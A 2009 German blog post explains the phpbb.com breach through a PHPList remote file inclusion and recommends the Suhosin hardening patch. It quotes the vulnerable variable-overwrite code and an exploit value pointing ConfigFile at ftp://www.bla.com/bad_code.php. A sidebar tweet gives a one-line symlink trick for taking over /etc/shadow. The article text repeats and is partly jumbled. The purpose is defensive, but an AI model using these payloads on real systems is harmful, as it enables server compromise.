Twitter Updates
- iOS 4.1 ist erschienen ... #iPhone 14 hours ago
- RT @boeserseo: Facebook XSS Lücke -> http://bseo.me/2h 4 days ago
- RT @Der_Dee: LOL! RT @LohukiDD: Adminwitz des Tages: "Deine Mutter arbeitet bei PING als Zeitüberschreitung" 2 weeks ago
- Netzneutralität - von Alexander Endl "GANZ GANZ EINFACH ERKLÄRT FÜR JEDERMANN" http://bit.ly/a5fGCW 2 weeks ago
- Intel CEO: ?We need antivirus, can someone buy me McAfee?? Few hours later: ?Done.? ?Great, which version?? ?Version ? ?? (via diverse) 2 weeks ago
- OSX: Snow Leopard Grafik-Update verfügbar: http://bit.ly/ayIcRb ^RK 3 weeks ago
- Ubuntu 10.04.1 LTS released - http://bit.ly/bqxvu9 3 weeks ago
- Schon bei Debian GNU/Linux bedankt? :-) http://thank.debian.net/ 3 weeks ago
- RT @alextgordon: On reconsideration, GIMP beats Filezilla for "Worst UI in existence" 3 weeks ago
- RT @ChrisZwitschert: #Debian wird heute 17 Jahre alt! Herzlichen Glückwunsch! 3 weeks ago
- Nerd-Shirts bei SPON vorgestellt: http://bit.ly/anlChx ^RK 3 weeks ago
- RT "@heiseonline: Oracle kehrt OpenSolaris den Rücken http://bit.ly/dq12Vy" aber bitte lasst #ZFS am leben! ^MP 3 weeks ago
- 1Password Beta für Windows erhältlich - bestes Passwort-Tool ever! http://bit.ly/92fHU1 ^RK 1 month ago
- RT @comex: Source now available for anyone interested: http://github.com/comex/star #iPhone #ios #jailbreak 1 month ago
- [...]derzeit würden die Menschen alle zwei Tage so viele Daten generieren, wie die die gesamte Menschheit bis 2003 erzeugt habe[...] #wow 1 month ago
- Herzliche Glückwünsche: Lisa Simpson hat heute geheiratet :D S06E19 "Lisas future" #The #Simpsons #010810 ^MP 1 month ago
- Happy SysAdmin-Day allen Admins da draußen!!! Auf das wir heute unsere verdiente Anerkennung bekommen :-) #sysadminday #2010 ^MP 1 month ago
- Für alle Konsoleros: Mortal Kombat double feature auf Kabel1 #games ^MP #finish #him :D 1 month ago
- für alle die noch ne "kleine" Nebeneinkunft suchen, sollte ja in ner Woche erledigt sein: http://bit.ly/bZiEdo :-D ^MP 1 month ago
- "InnoDB is now the default storage engine, rather than MyISAM, in the regular and enterprise versions of MySQL. " #mysql ^RK 1 month ago
- RT @FlashMueller: Live-TV auf dem iPad / iPhone erneut möglich: ARD, ZDF, RTL und Co als Live-Stream auch für? http://goo.gl/fb/0Xpji 2 months ago
- RT @jonoberheide: rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you'll own /etc/shadow) 2 months ago
- Neu im Blog: Spam mal anders: via Twitter oder Facebook auf SPON und anderen Newsseiten spammen http://bit.ly/ae2RMC 2 months ago
- Glückwunsch! Der @parkrocker hat unser Belkin KFZ-Set von T-Mobile auf dem Blog gewonnen :) http://bit.ly/cisky2 2 months ago
- für alle Java Fans da draußen: http://bit.ly/cNvWi0 #lol :D ^MP 2 months ago
< XSS-Lücke bei der Polizei Sachsen | [MIXED] Massenhaft Files umbenennen, SSH-Angriff via Amazon Webservices >
Friday, 6. February 2009
phpbb.com gehackt - PHP auf dem Server absichern!
Eben las ich, dass phpbb.com gehackt wurde und deshalb die Seite derzeit nicht erreichbar ist. Glücklichweise wurde diesmal nicht (wie schon so oft...) die Forensoftware selbst Opfer der eigenen Sicherheitslücken, sondern eine Installation des Newsletter-Managers PHPList. Das macht es natürlich nicht wirklich besser, erspart mir aber die Suche nach Problemen bzw. Updates der eigenen phpBB-Installationen.
Ich habe hier mal ein paar Fakten aus dem Heise-Forum aufbereitet, die offenbar von Stefan Esser (PHP-Autor und Entwickler des Suhosin-Patches) gepostet wurden:
Grund war ein Remote File Inclusion Problem, das durch einen Superglobals-Overwrite (dabei werden die Superglobalen-Variablen von PHP überschrieben, siehe auch hier) ausgelöst wurde. Hier wurde seitens PHPList schlampig programmiert, um "register_globals=off" zu umgehen oder sowas. Dabei wird beispielsweise oft fälschlicherweise der folgende Code verwendet, um GET/POST/COOKIE-Variablen später einfach verwenden zu können:
Der zur Verfügung gestellte Bugfix behebt dieses Problem nun durch eine recht banale Lösung:
Abhilfe schafft hier zweifelsfrei Suhosin, da hier konsequent GET/POST/COOKIE-Variablen mit den entsprechenden Namen ($_GLOBALS usw.) ignoriert und dementsprechend im Script auch nicht registriert werden. Ich habe eigentlich auf sämtlichen Servern seit einer ganzen Weile Suhosin laufen (via Debian auch als Paket installierbar) und kann nur Positives berichten. Probleme mit Scripten sind mir bisher nicht ein einziges Mal untergekommen.
Im Apache-Errorlog kann man dann, je nach Loglevel, auch die verhinderten Aktionen einsehen. Das sieht dann beispielsweise so aus:
Ich habe hier mal ein paar Fakten aus dem Heise-Forum aufbereitet, die offenbar von Stefan Esser (PHP-Autor und Entwickler des Suhosin-Patches) gepostet wurden:
Grund war ein Remote File Inclusion Problem, das durch einen Superglobals-Overwrite (dabei werden die Superglobalen-Variablen von PHP überschrieben, siehe auch hier) ausgelöst wurde. Hier wurde seitens PHPList schlampig programmiert, um "register_globals=off" zu umgehen oder sowas. Dabei wird beispielsweise oft fälschlicherweise der folgende Code verwendet, um GET/POST/COOKIE-Variablen später einfach verwenden zu können:
foreach ($_REQUEST as $key => $val) {Im Exploit wurde dann die Variable $_SERVER[ConfigFile]=../local-file../ einfach mit $_SERVER[ConfigFile]=ftp://www.bla.com/bad_code.php überschrieben. Da zur Prüfung der Variable dann is_file() benutzt wurde, lieferte PHP keinen Fehler. Seit PHP5 wird stat() nämlich auch vom ftp:// - Protokoll unterstützt.
$$key = $val;
}
Der zur Verfügung gestellte Bugfix behebt dieses Problem nun durch eine recht banale Lösung:
if (isset($_REQUEST['_SERVER'])) {Hier werden allerdings die zahlreichen anderen Superglobals wie $GLOBALS, $_GET, $_POST, $_REQUEST usw. nicht abgefangen. Damit könnten eventuell weitere Variablen im Script überschrieben werden und das nächste Leck ist offen.
exit;
}
Abhilfe schafft hier zweifelsfrei Suhosin, da hier konsequent GET/POST/COOKIE-Variablen mit den entsprechenden Namen ($_GLOBALS usw.) ignoriert und dementsprechend im Script auch nicht registriert werden. Ich habe eigentlich auf sämtlichen Servern seit einer ganzen Weile Suhosin laufen (via Debian auch als Paket installierbar) und kann nur Positives berichten. Probleme mit Scripten sind mir bisher nicht ein einziges Mal untergekommen.
Im Apache-Errorlog kann man dann, je nach Loglevel, auch die verhinderten Aktionen einsehen. Das sieht dann beispielsweise so aus:
suhosin[3077]: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '1xx.xxx.xxx.xxx', file '/www/.../index.php')Da sich in den Logs mitunter täglich hunderte solcher Einträge finden lassen, kann ich jedem Webserver-Admin nur empfehlen, PHP mit Suhosin abzusichern!
suhosin[635]: ALERT - configured GET variable value length limit exceeded - dropped variable 'variablen_name' (attacker '1xx.xxx.xxx.xxx', file '/www.../s.php')
suhosin[14381]: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'cutepath' (attacker '1xx.xxx.xxx.xxx, file '/www/.../tools.php')
Trackbacks
Trackback-URL für diesen Eintrag
Keine Trackbacks
powered by
Suche
Kommentare
06.09.10 10:32
NoSQL Testing: Cassandra, Memcached, Redis u [...]
19.08.10 08:36
Mit Time Machine unter Snow Leopard auf Netz [...]
04.08.10 13:13
ha!
da sucht man sich für seinen macbook pr [...]
31.07.10 08:33
Hallo ihr, der Trick bei meinem LED Cinema D [...]
28.07.10 10:04
Super Skript! Klasse!
Vielen Dank!
23.07.10 15:03
Hat mich schon zur WM genervt. Unter #wm gab [...]
22.07.10 20:50
Kennst Du Flagfox? Damit kann man sich den S [...]
22.07.10 16:51
Hetzner hat gute Rootserver Angebote, auch f [...]
20.07.10 15:33
Netter Link. Aber doch, Memcached ist imho s [...]
